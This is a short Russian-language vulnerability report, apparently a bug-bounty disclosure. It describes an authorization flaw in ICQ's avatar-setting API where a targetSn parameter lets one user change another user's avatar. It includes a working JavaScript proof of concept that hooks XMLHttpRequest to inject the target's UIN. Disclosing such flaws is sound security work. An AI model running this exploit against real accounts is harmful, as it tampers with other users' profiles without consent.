При обращении к API методу установки аватара пользователя (https://ub.icq.net/files/api/v1.1/avatar/set)
Можно передать дополнительный GET параметр: targetSn - с установленным UIN’ом любого пользователя
Тем самым можем изменить аватарку у любого пользователя
const XHR_OPEN = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function (...args) {
let url = new URL(args[1])
if (url.pathname === '/files/api/v1.1/avatar/set') {
url.searchParams.set('targetSn', '___UIN___')
args[1] = url.toString()
console.log(args[1])
}
return XHR_OPEN.apply(this, args);
}
█████████
Частичный доступ к управлению чужими аккаунтами (возможно уязвимость применима и к другим методам API).